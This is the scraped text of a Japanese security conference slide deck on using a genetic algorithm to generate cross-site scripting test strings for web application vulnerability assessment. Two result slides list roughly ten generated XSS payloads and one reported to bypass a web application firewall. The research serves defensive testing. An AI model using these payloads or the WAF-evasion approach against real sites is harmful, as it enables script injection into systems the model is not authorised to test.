Más contenido relacionado
La actualidad más candente (20)
Similar a 脆弱性診断データの活用例 - Webアプリケーション診断編 - (20)
脆弱性診断データの活用例 - Webアプリケーション診断編 -
- 2. About the speaker
• 職業 : セキュリティエンジニア
• 所属 : 三井物産セキュアディレクション
• 趣味 : 脆弱性スキャナ作り、機械学習
• ブログ: http://www.mbsd.jp/blog/
• AISECjp共同管理者
高江洲 勲
Takaesu Isao
(@bbr_bbq)
ssmjp
- 23. ssmjp
初期集団の生成
ランダムに遺伝子を選択して個体を生成
初期集団の生成
適応度評価
選択
交叉
突然変異
終了
{85, 158, 96, 32, 85} {179, 62, 33, 130, 133}
遺伝子リスト
{98, 82, 25, 41, 198} {55, 9, 94, 194, 55}
・・・
{76, 6, 114, 149, 70} {107, 140, 172, 150, 38}
{102, 169, 76, 90, 208} {21, 168, 111, 15, 159}
初期集団
個体例
</blockquote>content= <basefont/<form </blockquote>
<iframe/language= <keygen/</img>coords=
- 31. 検証結果:検査値の自動生成
ssmjp
No 検査値 新旧
1 <body onmouseover=alert(); <script <label <canvas </basefont> 新
2 <body onload=alert(); list=</a><canvas </progress> 旧
3 <svg/onload=alert(); </del></label>border=<embed/ 旧
4 <img </caption><script>al¥u0065rt();</script> 新
5 java"<object data=saivs.html </label> 新
6 confirm(1);><video><source/onerror=javascript:alert();> 新
7 <body ><video><source onerror=alert();> 新
8 <body ><video><source onerror=confirm(1);> 新
9 ¥u0061lert();</colgroup><video><source/onerror=al¥u0065rt();> 新
10 <iframe onload=alert();></basefont></caption> 新
・・・ ・・・ ・・・
約30種類の新たな検査値を生成
- 32. 検証結果:WAFの回避
ssmjp
世代 検査値 WAF
1 -(スクリプト実行不可) -
100 -(スクリプト実行不可) -
349 <th</colgroup><video><source/onerror=al¥u0065rt();> block
1641 <hr><video><source/onerror=javascript:window.onerror=alert();> block
2743 <object/><video><source onerror=javascript:alert();> block
4568 confirm(1);><video><source onerror=javascript:alert();> block
・・・ ・・・ ・・・
5047 <body ><video><source onerror=alert();> block
6067 <img/><video><source onerror=alert();> block
6192 confirm(1);/><video><source onerror=alert();> block
6307 <body ><video><source onerror=confirm(1);> break
6307世代目でWAFを回避する検査文字列を生成(所要時間:約5h)